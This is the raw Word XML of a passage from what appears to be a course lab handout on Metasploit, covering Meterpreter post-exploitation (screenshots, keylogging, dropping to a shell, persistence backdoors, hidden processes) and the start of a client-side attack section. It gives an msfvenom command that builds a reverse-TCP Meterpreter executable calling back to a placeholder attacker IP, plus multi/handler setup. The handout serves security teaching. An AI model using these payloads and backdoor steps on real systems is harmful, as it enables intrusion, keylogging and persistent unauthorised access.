          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin and use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>screengrab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” to get a screenshot. What went wrong? Also if you use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” to start the keylogger, and let’s suppose the victim types something on his keyboard; even after that you will also get nothing with “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">”! What do you think must be done? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Hint: check getuid again and also ask your instructor, because this depends on some system internals!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D7E5D4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7298BFF8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Checking all the Metasploit Post Exploitation modules will start but will be hard to end, so let’s finally check two more modules that are very useful for post exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690971A5" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A59BE27"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#3.10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sometimes we need to drop to a command line shell on the target; this can be done using the command “shell”. Finally, suppose you want to install a backdoor in order to get back to this compromised machine; Metasploit provides two quick ways for doing this: (1) using the “</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
          </w:rPr>
          <w:t>persistence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command or (2) using the “</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
          </w:rPr>
          <w:t>metsvc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command. Create a backdoor then reboot the system and try to get back into it. NOTE: use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>-h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” option with each command to show the options for configuring them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0B7A2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF1970B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Helpful reading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C6EFE" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/interacting-metsvc/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="267AD2A1" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50EF217C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E47854" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E8DFAB"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DIY #5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> How can you use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>” command to create a process hidden from view? Can we use it to create a hidden shell? If yes, show how.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD982F5" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0281BC29" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461C2B7D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The Metasploit’s Meterpreter Post Exploitation module doesn’t end here, take your time to explore as much as possible, I’m sure you’ll find lots of other useful modules which can aid your post exploitation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6AECFE" w14:textId="77777777" w:rsidR="009A5A00" w:rsidRDefault="009A5A00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD35E6" w14:textId="68BB7456" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part #4 – Performing Client Side Attacks using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C9A115" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In this part of the lab we will perform a different number of client side attacks using content files (exe and pdf), and then we will move to attacking the victim’s web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C356504" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077121C0" w14:textId="77777777" w:rsidR="00305534"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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Attacking the victim with malicious content files (exe/pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A286751" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Before we start this part of the lab make sure you have your Apache web server running, and create a folder to host your malicious files. This can be done using the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B105A7B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t>$ sudo systemctl restart apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6BE22B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t>$ sudo mkdir /var/www/files/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED08263" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7026BF9E" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now that we have our working environment prepared, we need to do one more step before we launch our attacks. We need to start the Metasploit’s Multi-Handler that we demonstrated in lecture for handling different kinds of payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991FE52" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D65540"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#4.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> To use the Metasploit multi handler, do the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09913A57" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377D707" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4780DC98" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now it’s up to you to choose the payload to be loaded when your victim tries to connect back to you. For this lab I assume you’re going to inject the Metasploit’s Meterpreter payload. Show how you are going to do that. (Don’t forget to use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” command after you finish configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B7DC6" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2934E481"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#4.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now let’s proceed to create our malicious files. The first malicious file we will create is just a reverse Meterpreter, which can be done like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2EFEF4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>msfvendom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>&lt;YOUR_IP_ADDRESS&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=5555 -f exe -o bug.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7CB87" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4347E1AB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>I recommend you check the generated file using the Linux ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>’ command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A93EFA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t>$ file bug.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E1DF33" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3C9452" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now copy the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bug.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” file to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/var/www/files/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, and goto your victim’s machine and browse to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://&lt;ip-address-of-kali-box&gt;/files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bug.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” file and double click on it to execute it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513041A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55912C04" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Check your Multi Handler, what happened?</w:t>
      </w:r>
    </w:p>
